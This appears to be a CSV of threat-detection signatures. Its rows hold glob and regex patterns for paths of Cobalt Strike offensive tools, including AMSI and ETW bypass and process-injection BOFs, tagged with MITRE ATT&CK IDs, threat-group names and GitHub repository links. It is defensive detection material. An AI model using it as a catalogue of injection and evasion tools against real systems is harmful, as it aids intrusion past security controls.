"*/injectAmsiBypass/*",".{0,1000}\/injectAmsiBypass\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/injectAmsiBypass","1","1","N/A","N/A","10","10","378","69","2023-03-08T15:54:57Z","2021-07-19T00:08:21Z","8067"
"*/inject-assembly/*",".{0,1000}\/inject\-assembly\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","N/A","10","10","494","74","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z","8068"
"*/injectEtw.*",".{0,1000}\/injectEtw\..{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike BOF - Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/injectEtwBypass","1","1","N/A","N/A","10","10","279","55","2021-09-28T19:09:38Z","2021-09-21T23:06:42Z","8069"
"*/Injection/clipboard/*",".{0,1000}\/Injection\/clipboard\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","8070"
"*/Injection/conhost/*",".{0,1000}\/Injection\/conhost\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","8071"
"*/Injection/createremotethread/*",".{0,1000}\/Injection\/createremotethread\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","8072"
"*/Injection/ctray/*",".{0,1000}\/Injection\/ctray\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","8073"
"*/Injection/dde/*",".{0,1000}\/Injection\/dde\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","8074"
"*/Injection/Injection.cna*",".{0,1000}\/Injection\/Injection\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","8075"
"*/Injection/kernelcallbacktable*",".{0,1000}\/Injection\/kernelcallbacktable.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","8076"
"*/Injection/ntcreatethread*",".{0,1000}\/Injection\/ntcreatethread.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","8077"
"*/Injection/ntcreatethread/*",".{0,1000}\/Injection\/ntcreatethread\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","8078"
"*/Injection/ntqueueapcthread*",".{0,1000}\/Injection\/ntqueueapcthread.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","8079"
"*/Injection/setthreadcontext*",".{0,1000}\/Injection\/setthreadcontext.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","8080"
"*/Injection/svcctrl/*",".{0,1000}\/Injection\/svcctrl\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","8081"
